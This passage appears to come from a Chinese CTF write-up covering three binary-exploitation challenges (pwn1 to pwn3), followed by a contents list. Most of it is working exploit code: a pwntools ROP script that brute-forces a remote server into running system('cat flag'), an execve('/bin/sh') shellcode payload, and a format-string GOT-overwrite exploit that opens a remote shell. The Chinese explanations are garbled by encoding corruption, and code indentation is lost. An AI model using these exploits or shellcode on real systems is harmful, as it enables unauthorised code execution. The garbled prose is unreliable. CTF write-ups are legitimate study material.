null = sh + len(cmd)
def main(system, target):
def getRop():
rop = pwn.ROP(binary)
rop.call(system, (sh, null))
return str(rop)
# pwn.gdb.attach(target)
# raw_input("debuger")
target.recv()
rop = getRop()
target.sendline(pay+rop+'a'*(0x70-len(rop+pay))+cmd+pwn.p32(sh+len(cmd)+12)+pwn.p32(sh+len(cmd)+12+4)+"\x00"*4+'cat\x00'+'flag'+'\x00' * 4)
# target.recv()
try:
a = target.recv()
except EOFError:
return
# target.interactive()
print a
exit(0)
# pwn.gdb.attach(target)
# system = raw_input("system:")
# system = int(system,16) + libc.symbols['execv']
# system = 0x00040190
for i in range(10000):
print i
try:
#target = pwn.process('/tmp/pwn1')
target = pwn.remote('115.28.241.138', 9000, timeout=1)
except:
continue
base = 0xb7574000
system = base + 0x000b5d20
# pwn.gdb.attach(target)
# system = raw_input("system:")
# system = int(system, 16) + libc.symbols['execv']
main(system, target)
target.close()

杩樺ソ鏈嶅姟鍣ㄧ綉閫熶笉閿橭rz

pwn2

绋嬪簭寰堢畝鍗曘傜敤mmap缁欎簡涓鏁寸墖鍙鍙啓鍙墽琛岀殑鈥滄柊澶ч檰鈥

闂鏄暣涔堢櫥涓婃柊澶ч檰鍛紵

棣栧厛鏄兘澶熻緭鍏5涓瓧鑺傜殑shellcode鐒跺悗璺宠浆鍒皊hellcode鎵ц銆傝繖5涓瓧鑺傜殑shellcode灏辨槸鍏抽敭鐨勫湴鏂逛簡銆傚啀缁忚繃2涓皬鏃剁殑鏃犳暟鑴戞礊涔嬪悗锛屾渶鍚庢兂鍒扮殑shellcode鏄繖涓

1
2
mov byte[esp],0xd2
ret

姝eソ5瀛楄妭銆傞鍏堟槸鐢╩ov鍚у嚱鏁扮殑杩斿洖鍦板潃鏇存敼鍒癿ain鍑芥暟涓璯ets閭d竴鍙

1
2
3
4
5
6
7
8
9
10
11
12
.text:080484BA mov [esp+28h], eax
.text:080484BE mov eax, [esp+28h]
.text:080484C2 add eax, 0FFAh
.text:080484C7 mov [esp+2Ch], eax
.text:080484CB mov eax, [esp+2Ch]
.text:080484CF mov [esp], eax ; s
.text:080484D2 call _gets <<<<<<<--------杩欓噷
.text:080484D7 mov dword ptr [esp+8], 5 ; n
.text:080484DF mov eax, [esp+2Ch]
.text:080484E3 mov [esp+4], eax ; src
.text:080484E7 mov eax, [esp+28h]
.text:080484EB mov [esp], eax ; dest

鍥犱负鐢╮et杩斿洖鐨勫叧绯汇傛暣涓爤鏄钩琛$殑銆傛墍浠ユ渶鍚庤繕鑳藉鍐嶆璺宠浆鐨勨滄柊澶ч檰鈥濄傚張鍥犱负鍦╮et鐨勬椂鍊欐爤閲岀殑甯冨眬鏄繖鏍风殑

1
2
3
4
5
6
7
00:0000| esp 0xff997c4c --> 0x80484f9 (<main+124>: leave)
01:0004| 0xff997c50 --> 0x31337000 --> 0xd22404c6
02:0008| 0xff997c54 --> 0x31337ffa --> 0xd22404c6
03:0012| 0xff997c58 --> 0x5
04:0016| 0xff997c5c --> 0x22 (b'"')
05:0020| 0xff997c60 --> 0x0
06:0024| 0xff997c64 --> 0x0

杩斿洖涔嬪悗鐨勫弬鏁版濂芥槸mmap鐨勯鍦板潃銆傝繖鏍风殑闀垮害灏卞鍐檚hellcode鍟︺

鏈鍚庣殑鑴氭湰锛屽涓

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#! /usr/bin/python
import pwn
#target = pwn.process('/tmp/pwn2')
target = pwn.remote("120.27.130.77",9000)
shellcode = "\xeb\x08\x61\x61\x61\x61\x41\x41\x41\x41\x68\x2f\x73\x68\xff\x68\x2f\x62\x69\x6e\x8d\x1c" \
"\x24\x31\xc0\x88\x43\x07\x50\x53\x89\xe1\x8d\x51\x04\x83\xc0\x0b\xcd\x80\x31\xc0\x40\x31" \
"\xdb\xcd\x80"
#pwn.gdb.attach(target)
#raw_input('debuger')
target.sendline('\xc6\x04\x24\xd2\xc3')
target.sendline(shellcode + 'a' * (4090 - len(shellcode)) + '\xeb\x08aaa')
target.interactive()

瀹岀粨鎾抯hellcode

pwn3

鎷垮埌鍚庣湅浜嗕細锛岀▼搴忎竴寮濮嬩細鍋氫釜楠岃瘉锛屾妸姣忎釜杈撳叆瀛楃+1鍚庡拰鈥漵ysbdmin鈥濇瘮杈
杩涘叆鍚庯紝鏈3涓姛鑳
1.putfile <-malloc涓娈靛唴瀛樺瓨鏀炬枃浠跺悕鍜屽唴瀹
2.getfile <-杈撳叆鏂囦欢鍚嶏紝杈撳嚭鍐呭(瀛樺湪鏍煎紡鍖栧瓧绗︿覆婕忔礊锛岄『渚夸細鎶婂唴瀹规斁鍦ㄦ爤涓)
3.show_dir <-鎶婃墍鏈夋枃浠跺悕瀛樻斁鍒版暟缁勶紝杈撳嚭鏁扮粍锛屼笖涓嶅垎鍓
鏍煎紡鍖栧瓧绗︿覆

閭d箞鎺ヤ笅鏉ョ殑鎬濊矾灏卞緢鑷劧浜
1.閫氳繃getfile鐨勬牸寮忓寲瀛楃涓叉嬁鍒發ibc鐨勭浉瀵逛綅缃
2.鍥犱负鍐呭鍙帶鍒惰屼笖杩樺湪鏍堜笂锛屽氨鍙互鏋勯犳寚鍚慻ot@plt鐨勬寚閽堬紝鐒跺悗閫氳繃%n(鏀瑰啓鎸囬拡鎸囧悜鐨勫间负宸茶緭鍑虹殑瀛楃涓暟)灏卞彲浠ユ敼got琛ㄤ簡

浣嗘湁鍑犱釜闂
1.铏界劧鍙互閫氳繃%n鏀瑰啓鍐呭瓨锛屼絾鎴戜滑瑕佸啓鍏ョ殑鏄湴鍧鍊硷紝涔熷氨鏄竴鑸杈撳嚭寰堝瀛楃
2.鏀瑰啓鎴愬摢涓湴鍧
3.鏀瑰啓鍝釜鍑芥暟

绗竴涓棶棰橈紝鍥犱负鍐欏叆鐨勬槸4瀛楄妭锛屾墍浠ユ垜浠彲浠ュ啓4娆★紝浣庝綅鍐欏埌楂樹綅锛屾瘡娆℃敼1瀛楄妭锛岃繖鏍锋渶澶氳緭鍑哄瓧绗︿篃灏辨槸256*4浜
姣斿 0x12345678 -> 0xdeadbeef 鍏堝啓鍏0xef 鐒跺悗寰涓婄Щ涓瀛楄妭鍐0xbe 杩欐牱灏辨湁浜0x0000beef 鈥
绗簩涓棶棰橈紝鏃㈢劧瑕佹敼锛屽綋鐒舵敼鎴恠ystem锛屽墠闈㈠彲浠ユ嬁鍒發ibc鐨勭浉瀵瑰湴鍧锛岃櫧鐒朵笉鐭ラ亾libc鐗堟湰锛屼笉杩囧彲浠ヨ窇鍟
绗笁涓棶棰橈紝鎴戜滑閫夌殑鍑芥暟搴旇鏄鑳芥帶鍒跺弬鏁扮殑锛岃屼笖鍦╣etfile涓笉浼氭秹鍙婂埌鐨勫嚱鏁帮紝涓寮濮嬫壘鎵句笉鍒帮紝鐒跺悗鎵嶅彂鐜皊how_dir鐨刾uts灏卞彲浠ャ傘傘傚洜涓簊how_dir鐨刾uts鐨勫弬鏁版槸鏂囦欢鍚嶏紝鑰屼笖puts鍦╣etfile涓彧鏈夎緭鍏lag鎵嶄細瑙﹀彂锛屾墍浠ュ苟涓嶇敤鎷呭績銆備簬鏄瘡娆¤緭鍏モ/bin/sh鈥濈殑涓涓瓧鑺傚氨鑳藉噾鍑烘潵鍙傛暟

ps:灏卞湪鎴戠殑test杈撳嚭0鐨勬椂鍊欙紝鎴戞嬁鍒颁簡shell
shell
payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *
#context.log_level = 'debug'
#R = process('./pwn3')
R=remote('120.27.155.82',9000)
def setvalue(addr,value):
a=['i','n','/','s']
for i in range(0,4):
R.write('put\n')
R.recvuntil(':')
R.write(a[3-i]+'\n')
R.recvuntil(':')
R.write('%'+'%03d'%((value>>(8*i)&0xff)-2)+'x'+' '+'%10$n'+p32(addr+i)+'\n')
R.recvuntil('>')
R.write('get\n')
R.recvuntil(':')
R.write(a[3-i]+'\n')
R.recvuntil('>')
i+=1
for i in range(0,1000):
R.recvuntil(':')
R.write('rxraclhm\n')
R.recvuntil('>')
R.write('put')
R.recv()
R.write('h'*1+'\n')
R.recv()
R.write('%x%x%x%x'+'\n')
R.recv()
R.write('get'+'\n')
R.recv()
R.write('h'+'\n')
s=R.recv()
libc=int(s[8:16],16)
sys=libc-0xb7e8683b+0xb7e56190
print '#####sys:%x'%(sys+i)
print '###test %d'%i
R.recvuntil('>')
R.write('dir')
R.recvuntil('>')
setvalue(0x804A028,sys)
R.write('put')
R.write('/b\n')
R.recv()
R.write('a\n')
R.recv()
R.write('dir')
R.interactive()
R.close()

CATALOG
  1. 1. pentest
    1. 1.1. IDS-Chicken
    2. 1.2. 钀濊帀淇变箰閮ㄧ郴鍒
      1. 1.2.1. 钀濊帀2
      2. 1.2.2. 钀濊帀1
      3. 1.2.3. 钀濊帀3
      4. 1.2.4. 钀濊帀4
  2. 2. misc
    1. 2.1. 绛句釜鍒
    2. 2.2. Best_Easy_Misc
    3. 2.3. True or False?
    4. 2.4. EZ Game
  3. 3. Base{瀹夌爜}
    1. 3.1. MISC1
    2. 3.2. MISC2
    3. 3.3. re1
    4. 3.4. re2
    5. 3.5. re3
  4. 4. BIN
    1. 4.1. 2048锛4096锛
    2. 4.2. Difffffffffuse
    3. 4.3. pwn1
    4. 4.4. pwn2
    5. 4.5. pwn3